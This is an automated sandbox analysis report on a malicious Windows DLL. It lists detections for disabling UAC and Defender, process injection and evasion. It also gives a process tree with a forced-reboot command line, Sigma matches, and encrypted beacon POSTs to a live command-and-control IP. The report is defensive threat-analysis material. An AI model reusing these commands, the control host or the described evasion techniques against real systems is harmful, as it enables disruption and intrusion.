Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BJtPlI.dll

Overview

General Information

Sample name:BJtPlI.dll
Analysis ID:1634520
MD5:056f31e74efa70a140105fdd74cff033
SHA1:162d5e9629452262324c8523895bc58e043496b0
SHA256:6a66672beba2df1babb7801f63f3e171cf09b0807e1f7be86b42617a29eb983b
Tags:dlluser-seeker
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contains functionality to modify Windows User Account Control (UAC) settings
Disable Windows Defender real time protection (registry)
Disables UAC (registry)
Disables Windows Defender (deletes autostart)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Modifies Windows Defender signatures updates days
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Uses shutdown.exe to shutdown or reboot the system
Checks if the current process is being debugged
Contains functionality to query network adapater information
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Shutdown
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7512 cmdline: loaddll32.exe "C:\Users\user\Desktop\BJtPlI.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7648 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7752 cmdline: rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 7904 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • WerFault.exe (PID: 6880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7904 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • rundll32.exe (PID: 2736 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • shutdown.exe (PID: 6804 cmdline: shutdown /r /t 0 /f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
        • rundll32.exe (PID: 6852 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • WerFault.exe (PID: 2852 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6852 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • rundll32.exe (PID: 7004 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7692 cmdline: rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8 MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • shutdown.exe (PID: 8088 cmdline: shutdown /r /t 0 /f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
      • rundll32.exe (PID: 8080 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 7464 cmdline: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • shutdown.exe (PID: 6876 cmdline: shutdown /r /t 0 /f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
      • rundll32.exe (PID: 6860 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 7952 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • rundll32.exe (PID: 5888 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 6668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 6880 cmdline: rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",cmlPc6dI8 MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6884 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, CommandLine: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7884, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, ProcessId: 6836, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, CommandLine: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7884, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, ProcessId: 6836, ProcessName: cmd.exe
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\BJtPlI.dll,cmlPc6dI8, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7692, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 7884, ProcessName: rundll32.exe
Sigma detected: Suspicious Execution of Shutdown
Source: Process startedAuthor: frack113: Data: Command: shutdown /r /t 0 /f, CommandLine: shutdown /r /t 0 /f, CommandLine|base64offset|contains: v', Image: C:\Windows\SysWOW64\shutdown.exe, NewProcessName: C:\Windows\SysWOW64\shutdown.exe, OriginalFileName: C:\Windows\SysWOW64\shutdown.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6836, ParentProcessName: cmd.exe, ProcessCommandLine: shutdown /r /t 0 /f, ProcessId: 8088, ProcessName: shutdown.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: BJtPlI.dllAvira: detected
Multi AV Scanner detection for submitted file
Source: BJtPlI.dllVirustotal: Detection: 65%Perma Link
Source: BJtPlI.dllReversingLabs: Detection: 68%
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
Source: BJtPlI.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 188.166.28.204 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 8.8.8.8 53
Source: global trafficTCP traffic: 192.168.2.5:49715 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.5:49713 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.5:49712 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.5:49710 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.5:49707 -> 8.8.8.8:53
Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 708Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 64 30 63 66 31 33 37 61 35 35 32 33 61 65 38 39 32 34 62 34 33 37 62 36 34 32 32 38 36 65 30 36 38 35 61 36 34 32 36 37 32 62 66 62 65 65 63 34 34 62 33 35 63 33 35 31 30 38 66 61 62 31 63 64 61 62 34 38 38 62 66 32 61 63 66 63 63 36 30 61 33 39 66 37 66 38 30 64 39 62 65 39 33 33 63 62 31 63 63 34 66 64 36 62 63 38 36 61 37 62 62 33 35 35 66 63 37 30 62 30 65 38 30 36 37 32 64 64 37 30 33 62 61 37 61 31 65 39 38 64 63 61 61 62 38 34 63 33 65 30 37 36 33 66 32 30 66 65 35 34 65 39 65 36 39 31 63 35 61 32 39 32 34 62 38 34 33 35 37 61 31 33 39 33 38 34 66 33 31 38 30 39 35 62 38 38 39 65 35 63 31 61 33 39 64 37 63 31 66 32 66 39 30 61 61 36 39 36 66 39 35 39 38 38 66 39 64 32 30 38 32 63 37 65 36 38 37 65 66 36 66 36 62 62 66 61 39 62 31 30 38 38 34 65 61 33 65 32 39 32 34 31 31 34 39 61 33 35 30 37 65 36 39 34 61 34 66 64 30 35 34 30 37 37 33 63 64 62 38 63 34 32 64 34 39 39 33 33 66 36 38 34 62 63 35 37 37 33 38 66 62 38 35 32 30 33 39 35 35 37 37 35 37 62 33 31 61 32 63 65 65 66 36 34 33 64 65 64 31 34 32 65 62 62 65 63 37 36 65 31 33 64 64 66 32 31 64 36 37 38 37 64 39 32 34 31 30 35 61 65 66 30 36 39 65 36 36 61 31 34 66 31 35 35 36 65 32 33 33 34 33 66 34 34 32 65 36 30 39 36 64 37 38 38 39 32 61 38 64 63 39 30 37 31 34 66 65 36 66 61 66 34 37 36 38 37 66 32 30 39 33 39 34 66 64 63 65 33 37 35 62 39 61 33 61 64 65 66 65 62 66 62 33 39 62 32 38 65 62 37 65 61 63 65 61 37 32 31 39 66 62 64 32 66 61 32 38 65 38 32 36 31 36 34 66 37 32 37 61 33 39 36 34 64 65 62 64 35 35 31 30 65 33 36 62 65 34 36 30 39 35 39 61 36 32 38 34 35 32 37 65 39 38 36 64 61 33 39 32 32 39 64 61 37 32 64 34 61 64 31 38 64 35 38 37 66 63 61 64 30 32 38 Data Ascii: 8308e0536daf5c8edd59fe3430214dffbfade4515a4a895844ec0c8edf1a11a7b48ace4bbacfc0257956dcf828b6e30489e1e85b5d91d65f09ae69f761aef2bc3ed09b26fed127f80cfa99980d36d0cf137a5523ae8924b437b642286e0685a642672bfbeec44b35c35108fab1cdab488bf2acfcc60a39f7f80d9be933cb1cc4fd6bc86a7bb355fc70b0e80672dd703ba7a1e98dcaab84c3e0763f20fe54e9e691c5a2924b84357a139384f318095b889e5c1a39d7c1f2f90aa696f95988f9d2082c7e687ef6f6bbfa9b10884ea3e29241149a3507e694a4fd0540773cdb8c42d49933f684bc57738fb852039557757b31a2ceef643ded142ebbec76e13ddf21d6787d924105aef069e66a14f1556e23343f442e6096d78892a8dc90714fe6faf47687f209394fdce375b9a3adefebfb39b28eb7ea
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 724Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 34 65 33 35 30 64 36 65 35 65 32 64 30 30 33 62 35 61 65 63 33 31 65 30 37 66 38 63 62 64 66 61 37 31 65 63 35 62 62 35 37 38 33 64 37 38 34 32 62 66 65 37 38 33 36 61 66 39 66 34 30 38 32 65 66 64 63 39 35 66 37 36 33 33 63 64 63 34 63 38 37 65 36 33 63 33 34 31 33 35 66 33 34 31 30 62 63 61 62 61 66 62 32 61 39 39 63 32 63 66 63 31 32 33 34 30 32 34 33 31 31 33 38 32 39 34 35 64 33 32 62 36 32 39 66 37 37 37 38 35 33 61 30 30 30 61 37 38 31 34 31 34 33 34 38 37 33 34 34 63 39 65 66 65 33 64 39 32 34 31 61 37 35 64 66 36 33 65 30 62 34 33 65 36 64 36 62 66 32 64 64 34 35 31 62 32 37 64 31 33 38 33 63 61 65 30 38 33 64 61 35 61 39 39 30 39 34 36 35 38 62 37 33 35 66 35 30 64 33 62 63 37 30 65 63 39 62 34 38 66 36 39 34 37 35 62 33 37 63 33 32 62 62 62 62 32 33 66 34 34 33 63 30 62 66 32 37 64 63 33 63 64 33 32 33 39 65 66 33 34 37 34 65 38 31 33 39 35 63 39 63 35 36 63 61 64 34 35 64 62 37 37 30 64 64 33 39 31 62 35 65 32 63 37 35 65 36 62 39 39 34 37 37 30 35 64 34 66 31 34 33 31 64 37 37 31 37 61 39 34 37 39 66 33 65 31 64 31 31 35 39 62 62 31 32 39 37 33 35 65 31 33 33 33 62 64 37 31 39 36 30 33 63 38 34 31 35 63 34 30 37 33 65 64 63 32 64 61 61 63 63 37 65 65 61 39 61 30 39 31 31 38 61 38 39 36 34 38 39 64 66 35 32 33 39 39 35 31 35 30 35 63 61 34 38 64 34 34 63 65 62 34 35 38 65 30 31 37 66 33 61 61 64 62 35 31 32 38 63 61 39 63 39 35 64 62 38 30 65 65 30 38 35 64 63 39 64 61 39 64 35 31 66 63 63 33 30 35 39 64 37 34 36 36 36 65 39 33 63 32 34 62 62 62 65 30 66 31 31 64 66 63 36 36 38 32 64 64 35 62 64 62 35 63 31 61 38 64 34 30 33 35 64 38 39 64 31 62 61 34 30 34 61 31 37 63 61 62 36 62 38 34 32 61 61 63 39 36 32 37 38 38 62 62 30 32 61 34 66 38 34 39 31 33 62 64 37 36 Data Ascii: 8308e0536daf5c8edd59fe3430214dffbfade4515a4a895844ec0c8edf1a11a7b48ace4bbacfc0257956dcf828b6e30489e1e85b5d91d65f09ae69f761aef2bc3ed09b26fed127f80cfa99980d364e350d6e5e2d003b5aec31e07f8cbdfa71ec5bb5783d7842bfe7836af9f4082efdc95f7633cdc4c87e63c34135f3410bcabafb2a99c2cfc1234024311382945d32b629f777853a000a7814143487344c9efe3d9241a75df63e0b43e6d6bf2dd451b27d1383cae083da5a99094658b735f50d3bc70ec9b48f69475b37c32bbbb23f443c0bf27dc3cd3239ef3474e81395c9c56cad45db770dd391b5e2c75e6b9947705d4f1431d7717a9479f3e1d1159bb129735e1333bd719603c8415c4073edc2daacc7eea9a09118a896489df523
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 718Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 32 35 38 66 62 61 62 36 36 36 36 34 30 36 35 31 33 33 61 64 32 35 33 62 65 36 64 31 36 32 30 62 38 63 39 39 34 66 66 63 39 35 38 35 63 33 65 37 61 34 33 32 35 30 65 61 32 34 30 61 33 65 65 38 62 37 37 61 31 33 39 39 33 33 31 37 34 61 30 36 38 64 66 33 63 30 65 30 32 36 32 35 66 32 63 39 65 61 33 38 62 34 31 30 36 39 61 36 35 32 36 61 34 37 30 62 36 35 61 35 61 66 64 66 38 61 63 64 34 64 32 34 65 65 64 36 37 35 36 39 39 33 39 30 32 32 39 62 39 66 35 34 65 35 61 32 38 34 36 64 62 64 33 39 61 38 32 30 63 30 66 32 65 31 61 63 31 38 38 62 64 38 62 64 31 65 31 34 37 63 38 64 36 31 38 39 61 63 33 30 30 34 30 38 34 34 63 63 36 38 38 66 65 33 37 61 63 64 30 32 62 62 31 39 32 37 63 66 64 39 66 35 36 34 65 61 64 62 36 38 39 34 31 35 66 34 62 61 32 65 37 31 62 32 37 66 37 37 63 32 61 38 66 32 65 37 37 62 30 64 62 61 61 38 37 63 65 30 35 64 34 63 66 37 66 37 31 65 61 66 37 31 33 38 64 64 36 33 35 31 39 38 35 32 39 65 61 63 31 34 35 65 35 37 65 61 35 37 37 35 32 63 30 33 65 33 62 35 66 30 63 38 66 66 30 66 36 35 62 64 66 30 61 66 38 62 36 31 39 36 62 37 30 61 35 34 36 30 32 33 65 37 36 39 62 32 31 65 63 33 33 31 63 35 62 33 38 32 34 30 31 33 33 31 62 34 37 37 32 37 30 36 38 33 35 64 66 33 64 35 61 33 64 31 32 31 35 34 66 35 38 38 38 34 33 32 66 31 63 66 36 33 66 64 35 39 64 64 62 38 39 65 31 31 65 64 31 30 31 63 65 31 66 38 33 31 30 62 32 33 32 38 30 63 33 39 32 34 61 37 31 37 32 36 66 31 37 34 35 64 37 32 61 38 65 63 64 62 61 62 39 37 39 64 32 33 37 63 34 32 31 63 33 66 65 36 33 34 35 64 64 61 37 62 33 62 34 34 30 30 38 32 65 31 62 30 32 62 31 65 35 66 65 36 64 61 33 30 31 38 63 30 64 63 35 38 62 62 32 64 34 61 64 31 38 64 35 38 37 66 63 61 64 30 32 38 31 37 36 35 66 31 Data Ascii: 8308e0536daf5c8edd59fe3430214dffbfade4515a4a895844ec0c8edf1a11a7b48ace4bbacfc0257956dcf828b6e30489e1e85b5d91d65f09ae69f761aef2bc3ed09b26fed127f80cfa99980d36258fbab66664065133ad253be6d1620b8c994ffc9585c3e7a43250ea240a3ee8b77a139933174a068df3c0e02625f2c9ea38b41069a6526a470b65a5afdf8acd4d24eed675699390229b9f54e5a2846dbd39a820c0f2e1ac188bd8bd1e147c8d6189ac30040844cc688fe37acd02bb1927cfd9f564eadb689415f4ba2e71b27f77c2a8f2e77b0dbaa87ce05d4cf7f71eaf7138dd635198529eac145e57ea57752c03e3b5f0c8ff0f65bdf0af8b6196b70a546023e769b21ec331c5b382401331b4772706835df3d5a3d12154f5888432f1cf63fd59ddb89e
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 728Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 37 39 63 62 66 31 64 64 65 39 34 30 38 65 61 32 36 62 38 62 35 36 37 61 66 32 37 65 63 34 64 30 63 66 36 35 33 38 64 63 37 32 65 34 32 32 65 64 31 34 65 66 64 62 36 31 61 61 32 31 65 64 34 32 64 63 31 65 61 65 64 32 31 37 64 30 66 35 38 62 33 32 66 65 65 34 66 30 63 65 34 35 36 38 32 64 66 65 38 34 64 65 35 63 37 30 63 31 31 66 64 63 38 38 31 32 34 61 33 38 39 39 34 61 65 61 38 61 31 39 63 65 37 66 37 62 33 33 30 32 31 63 64 37 35 63 61 32 66 32 37 61 37 35 66 37 30 39 32 64 62 31 34 63 62 30 63 33 64 37 38 66 35 63 37 66 65 35 63 32 62 61 64 62 66 34 63 62 33 65 32 61 35 66 31 30 37 33 66 62 30 62 37 63 39 35 62 30 61 34 34 36 37 36 38 30 66 64 63 37 65 35 31 38 66 30 34 64 66 66 36 35 31 33 64 66 65 39 38 62 37 34 61 63 65 37 34 65 66 33 35 30 62 64 37 30 61 62 35 37 36 33 61 36 35 32 33 36 37 38 31 31 31 63 31 39 62 39 31 31 33 31 62 35 31 36 38 64 65 32 63 65 61 39 37 62 64 38 32 66 34 30 63 63 32 30 37 32 36 36 33 32 31 64 33 30 66 32 30 64 65 31 35 33 39 37 38 35 30 30 32 63 61 63 64 30 38 36 30 32 34 36 38 30 61 33 65 37 61 32 35 35 35 66 61 35 39 63 66 39 31 61 33 36 65 34 30 61 36 30 62 38 64 32 39 65 34 61 30 62 64 30 37 35 63 32 37 66 64 36 38 33 38 31 64 37 61 64 33 31 30 35 38 63 62 64 34 35 31 64 33 37 62 62 39 34 32 36 37 32 31 66 38 32 64 30 33 38 31 36 30 34 35 65 34 65 30 38 30 30 64 65 36 66 61 64 62 64 66 33 37 38 37 35 31 31 61 64 35 65 66 65 31 31 34 30 34 38 64 61 33 33 31 62 32 38 64 30 33 62 36 31 65 62 39 33 36 33 66 62 39 65 34 63 39 30 34 61 31 35 64 30 62 33 66 34 66 32 34 64 32 65 38 62 65 33 61 39 34 30 30 66 32 65 61 37 30 61 39 38 61 66 66 39 38 66 64 66 64 33 34 34 39 38 30 37 32 32 32 39 66 62 30 39 35 39 66 38 64 31 63 35 63 66 30 30 33 33 61 66 65 36 Data Ascii: 8308e0536daf5c8edd59fe3430214dffbfade4515a4a895844ec0c8edf1a11a7b48ace4bbacfc0257956dcf828b6e30489e1e85b5d91d65f09ae69f761aef2bc3ed09b26fed127f80cfa99980d3679cbf1dde9408ea26b8b567af27ec4d0cf6538dc72e422ed14efdb61aa21ed42dc1eaed217d0f58b32fee4f0ce45682dfe84de5c70c11fdc88124a38994aea8a19ce7f7b33021cd75ca2f27a75f7092db14cb0c3d78f5c7fe5c2badbf4cb3e2a5f1073fb0b7c95b0a4467680fdc7e518f04dff6513dfe98b74ace74ef350bd70ab5763a6523678111c19b91131b5168de2cea97bd82f40cc207266321d30f20de1539785002cacd086024680a3e7a2555fa59cf91a36e40a60b8d29e4a0bd075c27fd68381d7ad3105
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 188.166.28.204User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 718Data Raw: 38 33 30 38 65 30 35 33 36 64 61 66 35 63 38 65 64 64 35 39 66 65 33 34 33 30 32 31 34 64 66 66 62 66 61 64 65 34 35 31 35 61 34 61 38 39 35 38 34 34 65 63 30 63 38 65 64 66 31 61 31 31 61 37 62 34 38 61 63 65 34 62 62 61 63 66 63 30 32 35 37 39 35 36 64 63 66 38 32 38 62 36 65 33 30 34 38 39 65 31 65 38 35 62 35 64 39 31 64 36 35 66 30 39 61 65 36 39 66 37 36 31 61 65 66 32 62 63 33 65 64 30 39 62 32 36 66 65 64 31 32 37 66 38 30 63 66 61 39 39 39 38 30 64 33 36 32 35 38 66 62 61 62 36 36 36 36 34 30 36 35 31 33 33 61 64 32 35 33 62 65 36 64 31 36 32 30 62 38 63 39 39 34 66 66 63 39 35 38 35 63 33 65 37 61 34 33 32 35 30 65 61 32 34 30 61 33 65 65 38 62 37 37 61 31 33 39 39 33 33 31 37 34 61 30 36 38 64 66 33 63 30 65 30 32 36 32 35 66 32 63 39 65 61 33 38 62 34 31 30 36 39 61 36 35 32 36 61 34 37 30 62 36 35 61 35 61 66 64 66 38 61 63 64 34 64 32 34 65 65 64 36 37 35 36 39 39 33 39 30 32 32 39 62 39 66 35 34 65 35 61 32 38 34 36 64 62 64 33 39 61 38 32 30 63 30 66 32 65 31 61 63 31 38 38 62 64 38 62 64 31 65 31 34 37 63 38 64 36 31 38 39 61 63 33 30 30 34 30 38 34 34 63 63 36 38 38 66 65 33 37 61 63 64 30 32 62 62 31 39 32 37 63 66 64 39 66 35 36 34 65 61 64 62 36 38 39 34 31 35 66 34 62 61 32 65 37 31 62 32 37 66 37 37 63 32 61 38 66 32 65 37 37 62 30 64 62 61 61 38 37 63 65 30 35 64 34 63 66 37 66 37 31 65 61 66 37 31 33 38 64 64 36 33 35 31 39 38 35 32 39 65 61 63 31 34 35 65 35 37 65 61 35 37 37 35 32 63 30 33 65 33 62 35 66 30 63 38 66 66 30 66 36 35 62 64 66 30 61 66 38 62 